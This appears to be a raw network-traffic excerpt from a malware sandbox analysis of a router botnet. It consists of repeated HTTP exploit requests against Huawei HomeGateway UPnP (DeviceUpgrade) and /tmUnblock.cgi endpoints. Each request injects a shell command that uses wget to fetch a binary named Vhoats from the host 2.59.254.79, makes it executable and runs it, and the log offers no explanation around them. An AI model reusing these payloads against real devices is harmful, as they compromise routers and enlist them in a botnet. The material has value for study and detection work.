Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
